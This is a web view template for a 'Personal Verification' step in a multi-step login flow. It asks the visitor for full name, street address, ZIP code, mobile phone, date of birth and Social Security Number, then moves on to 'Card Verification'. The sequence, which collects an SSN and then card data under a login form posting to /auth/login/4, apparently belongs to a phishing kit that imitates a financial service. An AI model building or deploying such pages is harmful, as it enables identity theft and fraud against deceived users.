@layout('layouts.app')

@section('content')
<div class="cb-main-content">
  <div class="progress-bar">
    <div class="cb-main-content-sub">
      <div class="container__content">
        <div class="cb-progress-bar">
          <p class="cb-progress-bar__label">
            75% Complete
          </p>
          <div class="cb-progress-bar__container">
            <div class="cb-progress-bar__bar" style="width: 75.33333%;"></div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="cb-main-content-sub">
    <div class="container__content">
      <form action="/auth/login/4" method="POST">
        <h1>Personal Verification</h1>
        <small>Help us confirm it's you by filling out the following.</small>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="fullName" name="fullName" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="fullName">Full Name</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Full Name</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="address" name="address" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="address">Street Address</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Street Address</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="zip" name="zip" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="zip">ZIP Code</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid ZIP Code</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="phone" name="phone" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="phone">Mobile Phone</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Mobile Phone</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="dob" name="dob" class="cb-input" type="text" placeholder="MM/DD/YYYY" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="dob">Date of Birth</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Date of Birth</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="ssn" name="ssn" class="cb-input cb-mask-input" type="password" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="ssn">
                  Social Security Number
                  <span class="cb-label-icon cb-label-icon--secure"></span>
                </label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Social Security Number</span>
          </div>
        </div>

        <div class="cb-actions-items" style="margin-top: 5rem;">
          <div class="cb-actions-item cb-actions-item--primary">
            <div class="cb-actions-primary-text">
              <div>Next: Card Verification</div>
            </div>
            <button class="button button--primary submitBtn" type="submit">
              Continue
            </button>
          </div>
        </div>
      </form>
    </div>
  </div>
</div>
@endsection

@section('script')
<script>
  $('#zip').mask('00000');
  $('#phone').mask('(000) 000-0000');
  $('#dob').mask('00/00/0000');
  $('#ssn').mask('000-00-0000');
</script>
@endsection